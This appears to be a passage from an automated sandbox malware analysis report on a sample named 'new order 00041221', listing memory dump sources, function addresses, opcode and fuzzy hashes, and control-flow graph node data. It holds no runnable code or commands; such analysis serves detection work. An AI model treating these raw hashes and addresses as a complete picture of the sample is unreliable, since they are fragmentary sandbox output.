                                            • Source File: 00000001.00000002.1277495288.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4df0000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8f5f53b8040cfd6cf0e8fb1d0e7043efef54e29c49e61001fc2075acdb5e52cc
                                            • Instruction ID: 1a5e61fc922668bb5f821d20b374b84627d236bbe365e861bfbc3b2f83123ed7
                                            • Opcode Fuzzy Hash: 8f5f53b8040cfd6cf0e8fb1d0e7043efef54e29c49e61001fc2075acdb5e52cc
                                            • Instruction Fuzzy Hash: 86D14935D10B1ACADB10EBA4C950A99F7B1FF95301F10CB9AE14A37214EB706AC9CF81
                                            Function 04C83E3C Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1727db5368ef0fa77693c77b9bac5bcaa301de63260fff63e1d72552172c592e
                                            • Instruction ID: def16fd2e907d256c987dc59efab8015cdc868612bd7ed7ad508cc6e7a1e7d03
                                            • Opcode Fuzzy Hash: 1727db5368ef0fa77693c77b9bac5bcaa301de63260fff63e1d72552172c592e
                                            • Instruction Fuzzy Hash: 93A17D32E002099FCF19EFB4C84059EB7B3FF85309B15856EE805AB265EB71E955CB80
                                            Function 04C85858 Relevance: .2, Instructions: 222COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1275971377.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4c80000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8b77d53b7007df0e16d4e09c4c4b952880f9123ed21f7dc26785fc1ebd77b596
                                            • Instruction ID: 267370a98d232f18365c758c457759137bde9f4421d3e7b08961e05f28c526fa
                                            • Opcode Fuzzy Hash: 8b77d53b7007df0e16d4e09c4c4b952880f9123ed21f7dc26785fc1ebd77b596
                                            • Instruction Fuzzy Hash: CEC1EAB1D81B45CAD738CF65E84819D7B71FB85324B926E09D1622B2D0EBB414EECF48
                                            Function 06B72B80 Relevance: .1, Instructions: 143COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eeba86c8ba730f30e78c785a50ffa4b9e13f862b78cace156f0cb30368792f91
                                            • Instruction ID: 71b343b8989ea6e81c6e16f4f6bac324f57712e3c641a01eafea083aeac9fa85
                                            • Opcode Fuzzy Hash: eeba86c8ba730f30e78c785a50ffa4b9e13f862b78cace156f0cb30368792f91
                                            • Instruction Fuzzy Hash: 64510CB0E046198FDB14CFA9C9805AEFBF2FF89300F1481AAD418AB355D7359A41CFA5
                                            Function 06B73400 Relevance: .1, Instructions: 133COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e676dff1756bc8270ecbd10d68d9bb26d276dad286bce0c3676ac2958ffd41f7
                                            • Instruction ID: 485cede0f8aa50d3e9df8fd8f7b0219e38c7107e5a8ea064189c22d86bd06a99
                                            • Opcode Fuzzy Hash: e676dff1756bc8270ecbd10d68d9bb26d276dad286bce0c3676ac2958ffd41f7
                                            • Instruction Fuzzy Hash: 545108B0E006198FDB14CFA9C5845AEFBF2BF89304F2481AAD818A7355D7359941DFA1
                                            Function 06B746A2 Relevance: .1, Instructions: 132COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ba1b1f8416197fc1eaf6c2fa4a309159a91975666d394378a2485dfa36c9a4d2
                                            • Instruction ID: 743b0daac0779dbe37dff4150479114b98f327b004ed9791d46e262f58127098
                                            • Opcode Fuzzy Hash: ba1b1f8416197fc1eaf6c2fa4a309159a91975666d394378a2485dfa36c9a4d2
                                            • Instruction Fuzzy Hash: 44510BB4E002198FDB14CFA9C5805AEBBF2FF89301F24C1AAD418A7355D7349942CFA1
                                            Function 06B74AD8 Relevance: .1, Instructions: 131COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1278448962.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6b70000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d5a6debee4f24e0381846c0a7f9390ae145dde4a09b98b25b5da7ac3f267e9bf
                                            • Instruction ID: eb49059a35215d04a6d90380fc49b40a628644138f82421c73753ae8a560c838
                                            • Opcode Fuzzy Hash: d5a6debee4f24e0381846c0a7f9390ae145dde4a09b98b25b5da7ac3f267e9bf
                                            • Instruction Fuzzy Hash: 7651FA70E006198BDB14CFA9C5805AEFBF2FF89205F1481AAD418A7355D7349D41CFA1

                                            Execution Graph

                                            Execution Coverage:14.2%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:11
                                            Total number of Limit Nodes:2
                                            execution_graph 20035 5a39b94 20040 5a39a4b 20035->20040 20037 5a39b8c LdrInitializeThunk 20038 5a39ce9 20037->20038 20040->20037 20041 5a39590 LdrInitializeThunk 20040->20041 20041->20040 20042 5a39ed8 20043 5a39f05 20042->20043 20045 5a3bde7 20043->20045 20047 5a3a20e 20043->20047 20048 5a39590 LdrInitializeThunk 20043->20048 20047->20045 20049 5a39590 LdrInitializeThunk 20047->20049 20048->20047 20049->20047

                                            Executed Functions

                                            Function 05A397B0 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 972 5a397b0-5a397df 973 5a397e1 972->973 974 5a397e6-5a3987c 972->974 973->974 976 5a3991b-5a39921 974->976 977 5a39881-5a39894 976->977 978 5a39927-5a3993f 976->978 981 5a39896 977->981 982 5a3989b-5a398ec 977->982 979 5a39953-5a39966 978->979 980 5a39941-5a3994e 978->980 984 5a39968 979->984 985 5a3996d-5a39989 979->985 983 5a39ce9-5a39de6 980->983 981->982 998 5a398ff-5a39911 982->998 999 5a398ee-5a398fc 982->999 990 5a39de8-5a39ded 983->990 991 5a39dee-5a39df8 983->991 984->985 986 5a39990-5a399b4 985->986 987 5a3998b 985->987 994 5a399b6 986->994 995 5a399bb-5a399ed 986->995 987->986 990->991 994->995 1004 5a399f4-5a39a36 995->1004 1005 5a399ef 995->1005 1001 5a39913 998->1001 1002 5a39918 998->1002 999->978 1001->1002 1002->976 1007 5a39a38 1004->1007 1008 5a39a3d-5a39a46 1004->1008 1005->1004 1007->1008 1009 5a39c6e-5a39c74 1008->1009 1010 5a39a4b-5a39a70 1009->1010 1011 5a39c7a-5a39c8d 1009->1011 1012 5a39a72 1010->1012 1013 5a39a77-5a39aae 1010->1013 1014 5a39c94-5a39caf 1011->1014 1015 5a39c8f 1011->1015 1012->1013 1023 5a39ab0 1013->1023 1024 5a39ab5-5a39ae7 1013->1024 1016 5a39cb1 1014->1016 1017 5a39cb6-5a39cca 1014->1017 1015->1014 1016->1017 1021 5a39cd1-5a39ce7 LdrInitializeThunk 1017->1021 1022 5a39ccc 1017->1022 1021->983 1022->1021 1023->1024 1026 5a39b4b-5a39b5e 1024->1026 1027 5a39ae9-5a39b0e 1024->1027 1030 5a39b60 1026->1030 1031 5a39b65-5a39b8a 1026->1031 1028 5a39b10 1027->1028 1029 5a39b15-5a39b43 1027->1029 1028->1029 1029->1026 1030->1031 1034 5a39b99-5a39bd1 1031->1034 1035 5a39b8c-5a39b8d 1031->1035 1036 5a39bd3 1034->1036 1037 5a39bd8-5a39c39 call 5a39590 1034->1037 1035->1011 1036->1037 1043 5a39c40-5a39c64 1037->1043 1044 5a39c3b 1037->1044 1047 5a39c66 1043->1047 1048 5a39c6b 1043->1048 1044->1043 1047->1048 1048->1009
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ae62008e8443651f0e4ce56113475bccbc871ca67568a7c0478c9cda554463a
                                            • Instruction ID: a778545d6548cb4b0d9b876b8eb422c2c0664224504521d7558f1d2dcd782230
                                            • Opcode Fuzzy Hash: 0ae62008e8443651f0e4ce56113475bccbc871ca67568a7c0478c9cda554463a
                                            • Instruction Fuzzy Hash: 18F1E474E00218CFDB14DFA9D984B9EBBB2BF88304F5481A9E448AB395DB719D85CF50
                                            Function 0127A088 Relevance: .9, Instructions: 899COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e31e712eb587f2e264e8125d2853337bddb26c50cbcad3bcd15ea04c0bb1170e
                                            • Instruction ID: 34f0fb5d0e218167eadf86e02bd4d6a6fe4b1b9def183d925a89e7245e14f0a7
                                            • Opcode Fuzzy Hash: e31e712eb587f2e264e8125d2853337bddb26c50cbcad3bcd15ea04c0bb1170e
                                            • Instruction Fuzzy Hash: 60827C31A1020ADFCB15CFA8C984AAFBBF2FF88320F198559E5059B2A5D731E941CB51
                                            Function 012729E0 Relevance: .8, Instructions: 844COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1788 12729e0-1272a3b 1792 1272a5d-1272aac 1788->1792 1793 1272a3d-1272a5c 1788->1793 1797 1272ac7-1272acf 1792->1797 1798 1272aae-1272ab5 1792->1798 1802 1272ad2-1272ae6 1797->1802 1799 1272ab7-1272abc 1798->1799 1800 1272abe-1272ac5 1798->1800 1799->1802 1800->1802 1804 1272afc-1272b04 1802->1804 1805 1272ae8-1272aef 1802->1805 1808 1272b06-1272b0a 1804->1808 1806 1272af5-1272afa 1805->1806 1807 1272af1-1272af3 1805->1807 1806->1808 1807->1808 1810 1272b0c-1272b21 1808->1810 1811 1272b6a-1272b6d 1808->1811 1810->1811 1819 1272b23-1272b26 1810->1819 1812 1272bb5-1272bbb 1811->1812 1813 1272b6f-1272b84 1811->1813 1814 12736b6 1812->1814 1815 1272bc1-1272bc3 1812->1815 1813->1812 1823 1272b86-1272b8a 1813->1823 1820 12736bb-1273c65 1814->1820 1815->1814 1817 1272bc9-1272bce 1815->1817 1821 1273664-1273668 1817->1821 1822 1272bd4 1817->1822 1824 1272b45-1272b63 call 12702c8 1819->1824 1825 1272b28-1272b2a 1819->1825 1842 1273c69-1273ca4 1820->1842 1828 127366f-12736b5 1821->1828 1829 127366a-127366d 1821->1829 1822->1821 1830 1272b92-1272bb0 call 12702c8 1823->1830 1831 1272b8c-1272b90 1823->1831 1824->1811 1825->1824 1826 1272b2c-1272b2f 1825->1826 1826->1811 1833 1272b31-1272b43 1826->1833 1829->1820 1829->1828 1830->1812 1831->1812 1831->1830 1833->1811 1833->1824 1842->1842 1844 1273ca6-1273cd9 1842->1844 1848 1273cdb-1273cdd 1844->1848 1849 1273cea-1273cf2 1844->1849 1850 1273ce3-1273ce8 1848->1850 1851 1273cdf-1273ce1 1848->1851 1852 1273cf4-1273d02 1849->1852 1850->1852 1851->1852 1855 1273d04-1273d06 1852->1855 1856 1273d18-1273d20 1852->1856 1857 1273d0f-1273d16 1855->1857 1858 1273d08-1273d0d 1855->1858 1859 1273d23-1273d26 1856->1859 1857->1859 1858->1859 1861 1273d3d-1273d41 1859->1861 1862 1273d28-1273d36 1859->1862 1863 1273d43-1273d51 1861->1863 1864 1273d5a-1273d5d 1861->1864 1862->1861 1868 1273d38 1862->1868 1863->1864 1873 1273d53 1863->1873 1866 1273d65-1273d9a 1864->1866 1867 1273d5f-1273d63 1864->1867 1875 1273dfc-1273e01 1866->1875 1867->1866 1870 1273d9c-1273db3 1867->1870 1868->1861 1871 1273db5-1273db7 1870->1871 1872 1273db9-1273dc5 1870->1872 1871->1875 1876 1273dc7-1273dcd 1872->1876 1877 1273dcf-1273dd9 1872->1877 1873->1864 1878 1273de1 1876->1878 1877->1878 1879 1273ddb 1877->1879 1881 1273de9-1273df5 1878->1881 1879->1878 1881->1875
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d1e7d21f4d1eef3971a6095249676138449045943c453070e0fdb67976b3508c
                                            • Instruction ID: c25787a88c60c3b73b943fccdc3cf143a2db7d375c09cf7c2b994013ee0c3912
                                            • Opcode Fuzzy Hash: d1e7d21f4d1eef3971a6095249676138449045943c453070e0fdb67976b3508c
                                            • Instruction Fuzzy Hash: 4C52B432E14763CFC7A5CF34C88A29BBBB1BF5532071885AFD4868A506E7349811CB97
                                            Function 012769A0 Relevance: .5, Instructions: 516COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5c26ca434c0800a16efb26719680e6669fa1b8ad169f57aa8910915bbeef8b9b
                                            • Instruction ID: 6822351aa9b4b22dc01648e14fc79778e5304ee08f53e17e4b868beb4d9e356d
                                            • Opcode Fuzzy Hash: 5c26ca434c0800a16efb26719680e6669fa1b8ad169f57aa8910915bbeef8b9b
                                            • Instruction Fuzzy Hash: 6812AF70A1061A8FEB15DF69D854BAEBBF6FF88300F108529E506DB395DB309D42CB90
                                            Function 01276FC8 Relevance: .5, Instructions: 462COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3419 1276fc8-1276ffe 3420 1277006-127700c 3419->3420 3554 1277000 call 12769a0 3419->3554 3555 1277000 call 1277118 3419->3555 3556 1277000 call 1276fc8 3419->3556 3421 127700e-1277012 3420->3421 3422 127705c-1277060 3420->3422 3423 1277014-1277019 3421->3423 3424 1277021-1277028 3421->3424 3425 1277077-127708b 3422->3425 3426 1277062-1277071 3422->3426 3423->3424 3429 12770fe-127713b 3424->3429 3430 127702e-1277035 3424->3430 3431 1277093-127709a 3425->3431 3551 127708d call 1279dd0 3425->3551 3552 127708d call 127a088 3425->3552 3553 127708d call 127a0e8 3425->3553 3427 1277073-1277075 3426->3427 3428 127709d-12770a7 3426->3428 3427->3431 3433 12770b1-12770b5 3428->3433 3434 12770a9-12770af 3428->3434 3441 1277146-1277166 3429->3441 3442 127713d-1277143 3429->3442 3430->3422 3432 1277037-127703b 3430->3432 3435 127703d-1277042 3432->3435 3436 127704a-1277051 3432->3436 3437 12770bd-12770f7 3433->3437 3439 12770b7 3433->3439 3434->3437 3435->3436 3436->3429 3440 1277057-127705a 3436->3440 3437->3429 3439->3437 3440->3431 3447 127716d-1277174 3441->3447 3448 1277168 3441->3448 3442->3441 3450 1277176-1277181 3447->3450 3451 12774fc-1277505 3448->3451 3452 1277187-127719a 3450->3452 3453 127750d-1277519 3450->3453 3458 12771b0-12771cb 3452->3458 3459 127719c-12771aa 3452->3459 3460 1277542-1277549 3453->3460 3461 127751b-1277521 3453->3461 3471 12771ef-12771f2 3458->3471 3472 12771cd-12771d3 3458->3472 3459->3458 3470 1277484-127748b 3459->3470 3468 1277552-1277556 3460->3468 3469 127754b-1277550 3460->3469 3462 1277523-127753d 3461->3462 3463 127754a-1277550 3461->3463 3462->3460 3466 127755c-127755d 3463->3466 3468->3466 3469->3466 3470->3451 3475 127748d-127748f 3470->3475 3476 127734c-1277352 3471->3476 3477 12771f8-12771fb 3471->3477 3473 12771d5 3472->3473 3474 12771dc-12771df 3472->3474 3473->3474 3473->3476 3478 1277212-1277218 3473->3478 3479 127743e-1277441 3473->3479 3474->3478 3480 12771e1-12771e4 3474->3480 3481 1277491-1277496 3475->3481 3482 127749e-12774a4 3475->3482 3476->3479 3483 1277358-127735d 3476->3483 3477->3476 3484 1277201-1277207 3477->3484 3489 127721e-1277220 3478->3489 3490 127721a-127721c 3478->3490 3491 1277447-127744d 3479->3491 3492 1277508 3479->3492 3485 127727e-1277284 3480->3485 3486 12771ea 3480->3486 3481->3482 3482->3453 3487 12774a6-12774ab 3482->3487 3483->3479 3484->3476 3488 127720d 3484->3488 3485->3479 3495 127728a-1277290 3485->3495 3486->3479 3493 12774f0-12774f3 3487->3493 3494 12774ad-12774b2 3487->3494 3488->3479 3496 127722a-1277233 3489->3496 3490->3496 3497 1277472-1277476 3491->3497 3498 127744f-1277457 3491->3498 3492->3453 3493->3492 3499 12774f5-12774fa 3493->3499 3494->3492 3500 12774b4 3494->3500 3501 1277296-1277298 3495->3501 3502 1277292-1277294 3495->3502 3504 1277246-127726e 3496->3504 3505 1277235-1277240 3496->3505 3497->3470 3506 1277478-127747e 3497->3506 3498->3453 3503 127745d-127746c 3498->3503 3499->3451 3499->3475 3507 12774bb-12774c0 3500->3507 3508 12772a2-12772b9 3501->3508 3502->3508 3503->3458 3503->3497 3526 1277274-1277279 3504->3526 3527 1277362-1277398 3504->3527 3505->3479 3505->3504 3506->3450 3506->3470 3510 12774e2-12774e4 3507->3510 3511 12774c2-12774c4 3507->3511 3518 12772e4-127730b 3508->3518 3519 12772bb-12772d4 3508->3519 3510->3492 3514 12774e6-12774e9 3510->3514 3515 12774c6-12774cb 3511->3515 3516 12774d3-12774d9 3511->3516 3514->3493 3515->3516 3516->3453 3521 12774db-12774e0 3516->3521 3518->3492 3532 1277311-1277314 3518->3532 3519->3527 3530 12772da-12772df 3519->3530 3521->3510 3522 12774b6-12774b9 3521->3522 3522->3492 3522->3507 3526->3527 3533 12773a5-12773ad 3527->3533 3534 127739a-127739e 3527->3534 3530->3527 3532->3492 3535 127731a-1277343 3532->3535 3533->3492 3538 12773b3-12773b8 3533->3538 3536 12773a0-12773a3 3534->3536 3537 12773bd-12773c1 3534->3537 3535->3527 3550 1277345-127734a 3535->3550 3536->3533 3536->3537 3539 12773c3-12773c9 3537->3539 3540 12773e0-12773e4 3537->3540 3538->3479 3539->3540 3544 12773cb-12773d3 3539->3544 3542 12773e6-12773ec 3540->3542 3543 12773ee-127740d call 12776f1 3540->3543 3542->3543 3547 1277413-1277417 3542->3547 3543->3547 3544->3492 3545 12773d9-12773de 3544->3545 3545->3479 3547->3479 3548 1277419-1277435 3547->3548 3548->3479 3550->3527 3551->3431 3552->3431 3553->3431 3554->3420 3555->3420 3556->3420
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 56b7e31b6e1ad2f063b3a1a929cdd14c1b8bdd61b6a2d357d5b7ec0339c29644
                                            • Instruction ID: b950a680c111b1934c6ae24258ab8be2fcc61cced6c936ae8b035497393759ab
                                            • Opcode Fuzzy Hash: 56b7e31b6e1ad2f063b3a1a929cdd14c1b8bdd61b6a2d357d5b7ec0339c29644
                                            • Instruction Fuzzy Hash: F1126C30A1021ADFDB15CF69D888AAEBBF6FF88300F158469E915EB265D730ED41CB50
                                            Function 0127C146 Relevance: .2, Instructions: 231COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3746 127c146-127c158 3747 127c184 3746->3747 3748 127c15a-127c172 3746->3748 3749 127c186-127c18a 3747->3749 3752 127c174-127c179 3748->3752 3753 127c17b-127c17e 3748->3753 3752->3749 3754 127c180-127c182 3753->3754 3755 127c18b-127c199 3753->3755 3754->3747 3754->3748 3757 127c1fb-127c1fc 3755->3757 3758 127c19b-127c19d 3755->3758 3759 127c1ff-127c202 3757->3759 3758->3759 3760 127c19f-127c1a1 3758->3760 3761 127c203-127c2ac call 12741a0 call 1273cc0 3759->3761 3760->3761 3762 127c1a3-127c1c8 3760->3762 3774 127c2b3-127c2d4 call 1275658 3761->3774 3775 127c2ae 3761->3775 3763 127c1cf-127c1f9 3762->3763 3764 127c1ca 3762->3764 3763->3757 3764->3763 3777 127c2d9-127c2e4 3774->3777 3775->3774 3778 127c2e6 3777->3778 3779 127c2eb-127c2ef 3777->3779 3778->3779 3780 127c2f4-127c2fb 3779->3780 3781 127c2f1-127c2f2 3779->3781 3783 127c302-127c310 3780->3783 3784 127c2fd 3780->3784 3782 127c313-127c357 3781->3782 3788 127c3bd-127c3d4 3782->3788 3783->3782 3784->3783 3790 127c3d6-127c3fb 3788->3790 3791 127c359-127c36f 3788->3791 3798 127c413 3790->3798 3799 127c3fd-127c412 3790->3799 3795 127c371-127c37d 3791->3795 3796 127c399 3791->3796 3800 127c387-127c38d 3795->3800 3801 127c37f-127c385 3795->3801 3797 127c39f-127c3bc 3796->3797 3797->3788 3799->3798 3802 127c397 3800->3802 3801->3802 3802->3797
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 644d9de4d56a6d305e8291e2fd04a0c9a3a7510caa06119e34c054e5d1cd2d66
                                            • Instruction ID: 303fdb1f87c7bc7dc94189633be10e8e7161db3f4b532bb1ec58a0b674a5defd
                                            • Opcode Fuzzy Hash: 644d9de4d56a6d305e8291e2fd04a0c9a3a7510caa06119e34c054e5d1cd2d66
                                            • Instruction Fuzzy Hash: 6FA11774E14219CFDB14DFB9D884A9EBBF2BF89310F14806AE909AB361DB309941CF51
                                            Function 01275362 Relevance: .2, Instructions: 193COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7d7d8048fbdf47890295acf94aae801ba01f8073d8f964e122e74ba3b32613a2
                                            • Instruction ID: 735bcbb23fd7857c8f4c24eb022182dfbeb358e42c620a35ef4dc58679a57e38
                                            • Opcode Fuzzy Hash: 7d7d8048fbdf47890295acf94aae801ba01f8073d8f964e122e74ba3b32613a2
                                            • Instruction Fuzzy Hash: 8891C574E10218DFDB14DFAAD884A9EFBF2BF89310F148069E809AB365DB349945CF10
                                            Function 0127CD28 Relevance: .2, Instructions: 191COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 05b383ff2bcdf3f97e6291238b4a442e31a3b804eef0039bd50d4f9b754a4f18
                                            • Instruction ID: 3df3122df9015fedd0fcebae13ded3aaed691a667a2551b43d421f1d5e19d456
                                            • Opcode Fuzzy Hash: 05b383ff2bcdf3f97e6291238b4a442e31a3b804eef0039bd50d4f9b754a4f18
                                            • Instruction Fuzzy Hash: DA81E874E10219CFDB14DFAAD844A9EBBF2BF89300F14C06AE419AB365DB309945CF51
                                            Function 0127C468 Relevance: .2, Instructions: 190COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dd83d3f2e572162a72ef8d8434fe2939de1009692ef0e4c94186c2efb81f3bec
                                            • Instruction ID: ac2beaed3b9a2f429206c9c3d58bf25fc8e621ac68c97af2b49087f027dde072
                                            • Opcode Fuzzy Hash: dd83d3f2e572162a72ef8d8434fe2939de1009692ef0e4c94186c2efb81f3bec
                                            • Instruction Fuzzy Hash: B881E874E10219CFEB14DFAAD884A9EBBF2BF88300F14D069E519AB365DB709941CF50
                                            Function 0127CFF7 Relevance: .2, Instructions: 187COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 88d2b0209e9a423a0d5846927fbe78b170a50619be8fa210eb3eaace84bda1d7
                                            • Instruction ID: e6fda60daee0a69cab31803fb0fed5e85226b4f22e5ba98552caf7323e95d7e4
                                            • Opcode Fuzzy Hash: 88d2b0209e9a423a0d5846927fbe78b170a50619be8fa210eb3eaace84bda1d7
                                            • Instruction Fuzzy Hash: 7881C574E10218DFEB14DFAAD844A9EBBF2BF88310F14C069E819AB365DB309945CF50
                                            Function 0127D2CA Relevance: .2, Instructions: 186COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 947d403e7c005151db05c8bbbad835953996d5f1e9ebe635c126be48d8627ac0
                                            • Instruction ID: 4b0df5debfda775cb5462e5c01e15d80e20a245a9e3d827674b8686e97ae7e78
                                            • Opcode Fuzzy Hash: 947d403e7c005151db05c8bbbad835953996d5f1e9ebe635c126be48d8627ac0
                                            • Instruction Fuzzy Hash: 2681C574E10218DFDB14DFAAD854A9EBBF2FF88310F148169E819AB365DB706941CF10
                                            Function 0127D599 Relevance: .2, Instructions: 185COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 55a96ef17941e69e29beac19c1a8a1cf27d496001066d91c29f3f1acf71b5c56
                                            • Instruction ID: df4c3ee7f721556bd153f87469ffc9e5054e8dddf20b9fe20e901841f662dda2
                                            • Opcode Fuzzy Hash: 55a96ef17941e69e29beac19c1a8a1cf27d496001066d91c29f3f1acf71b5c56
                                            • Instruction Fuzzy Hash: 0681B474E10218CFEB14DFAAD944A9EFBF2BF88310F148169E919AB365DB309945CF50
                                            Function 0127C738 Relevance: .2, Instructions: 185COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e834231231176451566fabbacd11e785bc8abfd083aaed7dbb727f10ebea70bb
